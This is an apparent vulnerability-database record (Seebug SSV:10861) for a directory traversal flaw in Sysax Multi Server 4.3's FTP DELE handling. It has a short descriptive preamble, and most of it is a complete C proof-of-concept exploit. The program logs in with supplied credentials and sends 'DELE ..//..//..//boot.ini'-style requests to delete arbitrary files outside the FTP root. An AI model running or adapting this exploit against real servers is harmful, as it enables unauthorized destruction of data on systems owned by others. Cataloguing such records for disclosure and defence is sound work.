Description
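No description provided by source. According to the header comment of the proof-of-concept embedded in the record below, Sysax Multi Server 4.3 has an input validation error in its handling of FTP "DELE" requests: "..//" directory traversal sequences in the file argument escape the FTP root, so files elsewhere on the system can be deleted. The proof-of-concept sends USER and PASS before DELE, so the issue appears to require valid FTP credentials. The observable indicator is a DELE request whose argument contains ".." sequences. The record lists no CVE identifier or references and names no fixed version, and its CVSS fields are unset (vector NONE, score 0.0), so the zero score should not be read as a severity rating.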
{"href": "https://www.seebug.org/vuldb/ssvid-10861", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-03-24T00:00:00", "title": "Sysax Multi Server 4.3 Remote Arbitrary Delete Files Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10861", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2009-03-24T00:00:00", "sourceData": "\n /*\r\nSysax Multi Server v4.3 Remote Delete Files.\r\nServer FTP.\r\nhttp://www.sysax.com/\r\n\r\n-------------------------------------------------------------------------------------\r\nA vulnerability is caused due to an input validation error when handling FTP \\"DELE\\" \r\nrequests. This can be exploited to escape the FTP root and delete arbitrary files on \r\nthe system via directory traversal attacks using the \\"..//\\" character sequence.\r\n-------------------------------------------------------------------------------------\r\n\r\nYou can delet file boot.ini => DELE ..//..//..//..//..//..//boot.ini\r\n\r\n\r\nAuthor: Jonathan Salwan\r\nMail : submit [AT] shell-storm.org\r\nWeb : http://www.shell-storm.org\r\n*/\r\n\r\n#include \\"stdio.h\\"\r\n#include \\"unistd.h\\"\r\n#include \\"stdlib.h\\"\r\n#include \\"sys/types.h\\"\r\n#include \\"sys/socket.h\\"\r\n#include \\"netinet/in.h\\"\r\n\r\nint syntax(char *file)\r\n\t{\r\n\tfprintf(stderr,\\"Sysax Multi Server v4.3 Remote Delete Files\\\\n\\");\r\n\tfprintf(stderr,\\"=>Syntax : <%s> <ip> <port> <login> <passwd> <file>\\\\n\\",file);\r\n\tfprintf(stdout,\\"=>Exemple : %s 127.0.0.1 21 login1 password1 ..//..//..//boot.ini\\\\n\\",file); \r\n\texit(0);\r\n\t}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n\tif (argc < 5)\r\n\t\tsyntax(argv[0]);\r\n\t\r\n\tint port = atoi(argv[2]);\r\n\r\n\tint mysocket;\r\n\tint mysocket2;\r\n\tint srv_connect;\r\n\tint sockaddr_long;\r\n\r\n\r\n\t\tstruct sockaddr_in sockaddr_mysocket;\r\n\t\tsockaddr_long = 
sizeof(sockaddr_mysocket);\r\n\t\tsockaddr_mysocket.sin_family = AF_INET;\r\n\t\tsockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);\r\n\t\tsockaddr_mysocket.sin_port = htons(port);\r\n\r\n char request[50];\r\n\tchar answer[100];\r\n\r\n fprintf(stdout,\\"[+]Connect to Server %s\\\\n\\",argv[1]);\r\n\r\n mysocket2 = socket(AF_INET, SOCK_STREAM, 0);\r\n if(mysocket2 == -1){\r\n fprintf(stderr,\\"[-]FAILED SOCKET\\\\n\\");\r\n\t\t\treturn 1;}\r\n\r\n\tsrv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);\r\n\t\t\r\n\tif (srv_connect != -1)\r\n \t\t{\t\r\n\r\n\t\tsprintf(request, \\"USER %s\\\\r\\\\n\\", argv[3]);\t\t\r\n\t\t\tif (send(mysocket2,request,strlen(request),0) == -1){\r\n\t\t\t\tfprintf(stderr,\\"[-]Send Request USER\\\\t\\\\t[FAILED]\\\\n\\");\r\n\t\t\t\tshutdown(mysocket2,1);\r\n\t\t\t\treturn 1;}\r\n\t\t\telse{\r\n\t\t\t\tmemset(answer,0,100);\r\n\t\t\t\trecv(mysocket2,answer,sizeof(answer),0);\r\n\t\t\t }\r\n\r\n\r\n\t\tsprintf(request, \\"PASS %s\\\\r\\\\n\\", argv[4]);\r\n if (send(mysocket2,request,strlen(request),0) == -1){\r\n fprintf(stderr,\\"[-]Send Request PASS\\\\t\\\\t[FAILED]\\\\n\\");\r\n shutdown(mysocket2,1);\r\n return 1;}\r\n else{ \r\n\t\t\t\tmemset(answer,0,100);\r\n recv(mysocket2,answer,sizeof(answer),0);\r\n fprintf(stdout,\\"[+]>>%s\\",answer);\r\n }\r\n\r\n\r\n sprintf(request, \\"SYST\\\\r\\\\n\\");\r\n if (send(mysocket2,request,strlen(request),0) == -1){\r\n fprintf(stderr,\\"[-]Send Request PASS\\\\t\\\\t[FAILED]\\\\n\\");\r\n shutdown(mysocket2,1);\r\n return 1;}\r\n else{\r\n memset(answer,0,100);\r\n recv(mysocket2,answer,sizeof(answer),0);\r\n fprintf(stdout,\\"[+]>>%s\\",answer);\r\n }\r\n\r\n\r\n\t\tsprintf(request, \\"DELE %s\\\\r\\\\n\\", argv[5]);\r\n if (send(mysocket2,request,strlen(request),0) == -1){\r\n fprintf(stderr,\\"[-]Send Request DELE\\\\t\\\\t[FAILED]\\\\n\\");\r\n shutdown(mysocket2,1);\r\n return 1;}\r\n else{ \r\n\t\t\t\tmemset(answer,0,100);\r\n 
recv(mysocket2,answer,sizeof(answer),0);\r\n fprintf(stdout,\\"[+]>>%s\\",answer);\r\n }\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\telse{\r\n\t\tfprintf(stderr,\\"[-]Connect\\\\t\\\\t[FAILED]\\\\n\\");\r\n\t\tshutdown(mysocket2,1);\r\n\t\treturn 1;}\r\n\r\n\r\n\tshutdown(mysocket2,1);\r\n\r\n\r\nfprintf(stdout,\\"[+]Done! %s has been deleted\\\\n\\", argv[5]);\r\nreturn 0;\r\n}\n ", "id": "SSV:10861", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:55:39", "reporter": "Root", "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645567449}}
{}